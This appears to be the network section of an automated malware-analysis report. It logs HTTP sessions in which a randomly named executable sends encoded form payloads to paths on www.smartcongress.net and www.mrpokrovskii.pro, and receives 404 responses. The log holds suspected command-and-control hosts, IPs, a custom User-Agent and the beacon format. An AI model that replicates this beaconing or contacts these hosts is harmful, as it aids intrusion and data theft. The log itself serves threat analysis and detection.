                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        10192.168.2.949893146.88.233.115806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:21:25.623847961 CET631OUTPOST /11t3/ HTTP/1.1
                                                                                                                        Host: www.smartcongress.net
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.smartcongress.net
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.smartcongress.net/11t3/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 36 4f 56 53 48 49 41 72 2b 2f 42 72 4f 52 33 50 33 65 66 61 5a 6c 48 46 7a 53 70 42 2f 50 4d 38 31 37 63 50 53 6b 41 34 39 6c 67 79 4a 49 68 67 51 44 70 78 45 6e 37 4c 48 51 6b 31 6b 61 37 72 77 6a 47 37 47 45 73 36 31 5a 49 37 4a 68 50 6d 45 72 46 62 78 47 30 6a 61 68 6c 39 44 58 61 4f 5a 41 54 53 54 34 38 4d 45 59 4d 79 59 62 68 42 71 44 73 5a 57 34 67 6c 67 51 41 56 72 6e 6e 41 73 64 7a 53 70 34 61 62 35 6a 6d 47 6f 2b 74 6f 78 76 79 53 79 37 49 55 30 55 7a 48 61 7a 55 46 72 5a 32 73 51 45 65 75 56 58 6d 6f 78 6f 43 4e 52 39 68 75 49 62 6f 65 36 42 68 62 64 7a 69 4f 54 64 7a 79 41 51 3d 3d
                                                                                                                        Data Ascii: bBw=Mq/wbTVEdvZa6OVSHIAr+/BrOR3P3efaZlHFzSpB/PM817cPSkA49lgyJIhgQDpxEn7LHQk1ka7rwjG7GEs61ZI7JhPmErFbxG0jahl9DXaOZATST48MEYMyYbhBqDsZW4glgQAVrnnAsdzSp4ab5jmGo+toxvySy7IU0UzHazUFrZ2sQEeuVXmoxoCNR9huIboe6BhbdziOTdzyAQ==
                                                                                                                        Nov 21, 2024 16:21:26.929130077 CET380INHTTP/1.1 404 Not Found
                                                                                                                        content-type: text/html; charset=iso-8859-1
                                                                                                                        content-length: 196
                                                                                                                        date: Thu, 21 Nov 2024 15:21:26 GMT
                                                                                                                        server: LiteSpeed
                                                                                                                        x-tuned-by: N0C
                                                                                                                        connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        11192.168.2.949899146.88.233.115806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:21:28.293591022 CET1644OUTPOST /11t3/ HTTP/1.1
                                                                                                                        Host: www.smartcongress.net
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.smartcongress.net
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.smartcongress.net/11t3/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 36 4f 56 53 48 49 41 72 2b 2f 42 72 4f 52 33 50 33 65 66 61 5a 6c 48 46 7a 53 70 42 2f 50 55 38 70 59 55 50 64 6e 34 34 38 6c 67 79 49 49 68 6a 51 44 6f 68 45 6d 53 43 48 51 6f 50 6b 59 44 72 77 41 4f 37 42 32 55 36 67 4a 49 37 55 78 50 6e 4c 4c 46 4f 78 47 6b 76 61 68 56 39 44 58 61 4f 5a 44 37 53 55 70 38 4d 49 34 4d 31 66 62 68 4e 38 7a 73 31 57 35 49 54 67 52 30 76 72 30 2f 41 76 2b 62 53 71 4b 43 62 31 6a 6d 41 72 2b 74 4b 78 76 4f 4e 79 37 55 79 30 55 33 68 61 30 34 46 70 4d 50 6e 4b 58 32 6b 4f 78 33 64 36 50 65 74 66 4a 78 47 43 4b 77 43 76 45 73 31 4a 78 6a 61 61 74 79 63 43 35 59 41 55 2f 39 72 53 6f 71 63 6e 4d 35 68 38 49 49 42 64 2b 52 2f 74 34 4e 59 67 30 52 45 37 4f 51 66 65 4c 39 57 76 39 4f 61 6a 36 62 41 6b 47 34 56 61 6c 71 30 37 58 33 33 55 6e 38 72 31 6b 72 31 4b 2b 6b 77 68 44 44 59 48 54 44 58 4a 74 6e 47 41 32 75 42 2f 4c 70 34 78 69 70 50 38 4d 69 50 4e 76 4e 36 62 63 70 47 6a 35 70 74 43 72 79 50 46 37 44 7a 6f 57 6b 38 6c 45 [TRUNCATED]
                                                                                                                        Data Ascii: bBw=Mq/wbTVEdvZa6OVSHIAr+/BrOR3P3efaZlHFzSpB/PU8pYUPdn448lgyIIhjQDohEmSCHQoPkYDrwAO7B2U6gJI7UxPnLLFOxGkvahV9DXaOZD7SUp8MI4M1fbhN8zs1W5ITgR0vr0/Av+bSqKCb1jmAr+tKxvONy7Uy0U3ha04FpMPnKX2kOx3d6PetfJxGCKwCvEs1JxjaatycC5YAU/9rSoqcnM5h8IIBd+R/t4NYg0RE7OQfeL9Wv9Oaj6bAkG4Valq07X33Un8r1kr1K+kwhDDYHTDXJtnGA2uB/Lp4xipP8MiPNvN6bcpGj5ptCryPF7DzoWk8lE6FVd7yEX8F8nupG2UeCZG+fleAO1HcN9QYOk9CEjZs0ha+QEL7euE3gm46uVbXLAGB9+2MZYll2VHWXLXnn4y+A2EuNmt5UbRrMBg5ZfU2IQas+OnGD6o0J4BsGfhFMgcP8ArFwzuPCnhi6I9XqTvXKs2mnwfjDq4nM5dNCdCwzLzfSnq+cdS/uXpyJspGZYaFxeBSfXYmLnoSbIeCCYUdWawH2kWW4EI6WaSof2/0Vo/tD3xAC4kFWUZ723uy5+uJZT1Zc/9m2rGUs1n2hUjfoIUX/BV/w9EfYfJMJXzPJwxsDZhg0OxBZxeRIGRdtC2xRoBk7aD3eC2l4S4CLRHWF8dPrhMHxL0c1WJmc7MIqOy6ZLoTSEBECsW/RuPeMd17Ww9hRYoQo8IOIwEbbPhcVI6Bea9FCpFZ8+Alg/jOuD8gISDrLJh9RHSfc43aTEdtxGAiw25w3eOk7ADKZS+Gg7xbQhEKtPL4MwbKYFHTDRR6XWZHpImi31S1zQ44sFMZ0epe2DmUu4MKJvOukeb+abiocDky7WVa6Xelws75PmsN95XqWajRxfHR8D4GXgHwn1INQ7GdfvtpieRXuMU1IpRJn5WkiOhsYqz2wcuqkj42q2jDWSvCpk9nnxrEE8x/348xUbpeN1OO1KcNvFEVYVA1DGco/Rib [TRUNCATED]
                                                                                                                        Nov 21, 2024 16:21:29.617098093 CET380INHTTP/1.1 404 Not Found
                                                                                                                        content-type: text/html; charset=iso-8859-1
                                                                                                                        content-length: 196
                                                                                                                        date: Thu, 21 Nov 2024 15:21:29 GMT
                                                                                                                        server: LiteSpeed
                                                                                                                        x-tuned-by: N0C
                                                                                                                        connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        12192.168.2.949905146.88.233.115806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:21:30.961869001 CET343OUTGET /11t3/?bBw=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL013w88VAS70Y9JS73ZjbBY8NXuVWXuwPQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1
                                                                                                                        Host: www.smartcongress.net
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Nov 21, 2024 16:21:32.302743912 CET380INHTTP/1.1 404 Not Found
                                                                                                                        content-type: text/html; charset=iso-8859-1
                                                                                                                        content-length: 196
                                                                                                                        date: Thu, 21 Nov 2024 15:21:32 GMT
                                                                                                                        server: LiteSpeed
                                                                                                                        x-tuned-by: N0C
                                                                                                                        connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        13192.168.2.949923194.85.61.76806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:21:38.504432917 CET604OUTPOST /2pji/ HTTP/1.1
                                                                                                                        Host: www.mrpokrovskii.pro
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.mrpokrovskii.pro
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 56 49 42 6c 6e 71 72 58 31 36 62 45 45 2f 70 79 34 42 55 7a 34 37 4e 6f 6c 4c 73 43 68 45 6f 45 70 6b 39 66 74 65 76 62 67 78 38 66 5a 59 68 54 45 67 44 61 4f 5a 68 6b 59 42 62 4c 43 7a 61 6e 6c 38 77 36 51 79 51 56 37 44 52 72 75 76 59 53 39 33 4c 5a 2f 6d 68 39 63 64 53 6a 6a 36 51 66 55 4e 6e 72 4a 55 31 2b 56 56 70 31 57 73 71 30 44 4f 31 50 2f 49 72 6e 55 39 61 55 44 64 51 41 42 37 63 36 4f 2b 2f 2b 32 68 4b 4e 59 6e 4e 4d 35 41 57 59 6c 69 42 36 56 44 48 5a 2f 69 4b 72 65 35 70 6d 79 6e 4c 6f 54 6a 55 43 4f 69 77 31
                                                                                                                        Data Ascii: bBw=35Kg7n3KcwIOVIBlnqrX16bEE/py4BUz47NolLsChEoEpk9ftevbgx8fZYhTEgDaOZhkYBbLCzanl8w6QyQV7DRruvYS93LZ/mh9cdSjj6QfUNnrJU1+VVp1Wsq0DO1P/IrnU9aUDdQAB7c6O+/+2hKNYnNM5AWYliB6VDHZ/iKre5pmynLoTjUCOiw1
                                                                                                                        Nov 21, 2024 16:21:39.889962912 CET691INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:21:39 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 548
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        14192.168.2.949931194.85.61.76806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:21:41.176211119 CET628OUTPOST /2pji/ HTTP/1.1
                                                                                                                        Host: www.mrpokrovskii.pro
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.mrpokrovskii.pro
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 48 5a 78 6c 6c 4e 2f 58 7a 61 62 48 61 50 70 79 32 68 55 33 34 36 78 6f 6c 4b 70 48 68 52 41 45 71 41 35 66 72 71 62 62 6e 78 38 66 4d 6f 67 5a 4a 41 44 52 4f 5a 64 61 59 46 48 4c 43 7a 4f 6e 6c 2b 34 36 52 46 38 53 36 54 52 70 33 2f 59 51 6c 58 4c 5a 2f 6d 68 39 63 64 58 47 6a 38 34 66 56 38 58 72 49 31 31 39 4a 46 70 32 65 4d 71 30 49 75 31 55 2f 49 71 43 55 38 57 36 44 65 34 41 42 2f 59 36 4f 71 72 39 34 68 4b 4c 41 48 4d 6d 2b 56 4c 47 68 51 6b 69 4b 79 62 34 75 6a 71 59 5a 59 56 34 6a 56 43 7a 47 30 55 6c 4a 46 35 64 75 4a 6c 44 2b 74 4b 57 77 4a 68 65 32 6a 68 75 42 4d 6c 4e 31 41 3d 3d
                                                                                                                        Data Ascii: bBw=35Kg7n3KcwIOHZxllN/XzabHaPpy2hU346xolKpHhRAEqA5frqbbnx8fMogZJADROZdaYFHLCzOnl+46RF8S6TRp3/YQlXLZ/mh9cdXGj84fV8XrI119JFp2eMq0Iu1U/IqCU8W6De4AB/Y6Oqr94hKLAHMm+VLGhQkiKyb4ujqYZYV4jVCzG0UlJF5duJlD+tKWwJhe2jhuBMlN1A==
                                                                                                                        Nov 21, 2024 16:21:42.553632021 CET691INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:21:42 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 548
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        15192.168.2.949937194.85.61.76806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:21:43.847217083 CET1641OUTPOST /2pji/ HTTP/1.1
                                                                                                                        Host: www.mrpokrovskii.pro
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.mrpokrovskii.pro
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 48 5a 78 6c 6c 4e 2f 58 7a 61 62 48 61 50 70 79 32 68 55 33 34 36 78 6f 6c 4b 70 48 68 52 59 45 70 7a 78 66 74 37 62 62 6d 78 38 66 51 34 67 61 4a 41 44 4d 4f 64 78 65 59 46 4c 62 43 77 32 6e 6c 63 41 36 59 58 45 53 77 54 52 70 2f 66 59 56 39 33 4b 44 2f 6d 78 35 63 64 48 47 6a 38 34 66 56 2b 50 72 42 45 31 39 61 31 70 31 57 73 71 77 44 4f 30 61 2f 49 6a 2f 55 38 43 45 44 50 59 41 41 62 38 36 49 63 58 39 77 68 4b 4a 56 48 4d 2b 2b 56 50 6e 68 51 4a 54 4b 79 76 47 75 6b 47 59 63 4f 31 6a 68 67 69 53 5a 56 68 56 4d 6b 42 50 73 63 41 71 79 4e 33 79 75 5a 39 44 77 68 6f 6b 49 65 51 33 71 68 4e 31 47 76 44 72 43 71 46 73 46 56 66 6a 37 31 45 52 6a 4f 2f 37 35 4a 6d 2b 37 51 6a 75 71 42 55 38 6d 57 44 42 66 6f 4f 53 79 6f 36 73 31 4f 56 71 70 2b 4c 6b 49 52 6d 76 65 45 45 74 6c 74 38 36 6e 55 6c 53 44 51 34 62 4d 41 7a 41 6e 7a 56 6c 2b 59 47 35 4c 76 31 42 38 6f 52 50 50 45 67 6a 77 6e 59 45 34 5a 69 41 66 30 42 6e 59 38 71 48 2b 4d 6a 6d 72 32 34 6a 68 55 [TRUNCATED]
                                                                                                                        Data Ascii: bBw=35Kg7n3KcwIOHZxllN/XzabHaPpy2hU346xolKpHhRYEpzxft7bbmx8fQ4gaJADMOdxeYFLbCw2nlcA6YXESwTRp/fYV93KD/mx5cdHGj84fV+PrBE19a1p1WsqwDO0a/Ij/U8CEDPYAAb86IcX9whKJVHM++VPnhQJTKyvGukGYcO1jhgiSZVhVMkBPscAqyN3yuZ9DwhokIeQ3qhN1GvDrCqFsFVfj71ERjO/75Jm+7QjuqBU8mWDBfoOSyo6s1OVqp+LkIRmveEEtlt86nUlSDQ4bMAzAnzVl+YG5Lv1B8oRPPEgjwnYE4ZiAf0BnY8qH+Mjmr24jhUPBnSe98dYjBDRLIWQWYGD9x6tkM1XYXQQNRnTdnF0ufh7vZaySS68XQbVSccGhyGq8zb0CyRR4sM1Z7aIlPt55c/87IyouMwD4HUkvVLKs2PJ19DBjEbpph5A8lJuyY09M4MHbInnUfwUk+AgcbXijIiNHEs/C+ZraCy96dhclo3AKGXHhXw4oKX2y/L7K5mzlFL59+SNCya+SxIkfT2udQ3qTJu+RykL53+TIJmfgUhr5hfLvUIoRgBqyj6zvYjjtHjq4RogKCoHZhTseLAssm+Nl3p0Ag/SnXS5X6d4SHhLclyqzBnoVz9sGCtp/RwHITB7WjVr34Ls11uMuWIV8X4MKqM6UCwarpIfTFTuKBuhAIZUb8eO28q+Hss1Fl6ZIQy1pI96DXO3h4PV4fBMNuBAM6bl8lcHISSA2Yza+gnSAyLlj5Dzh2zFn0GgWeqHrfd8bpEH+PwtaS3HNJJX8Ifc6EVRoWpmzrlbb7Iz82Obe3XcFUOBaDR4guL8bbFD74xu3AQCbokbbQ+1lDqXmeWIjogcZguAQhHQUqXWWtZB0SXJFkxf25PpOLVCEPTLPOiQL4gHbk3m8SIZw3/sL2EIkBdt5CiwKjBWavcnrTluVvq7ZVeiFsOa5f089MBYnKFPJKoD3NGa1dV+XgzETZii4J03VUfMz [TRUNCATED]
                                                                                                                        Nov 21, 2024 16:21:45.235052109 CET691INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:21:45 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 548
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
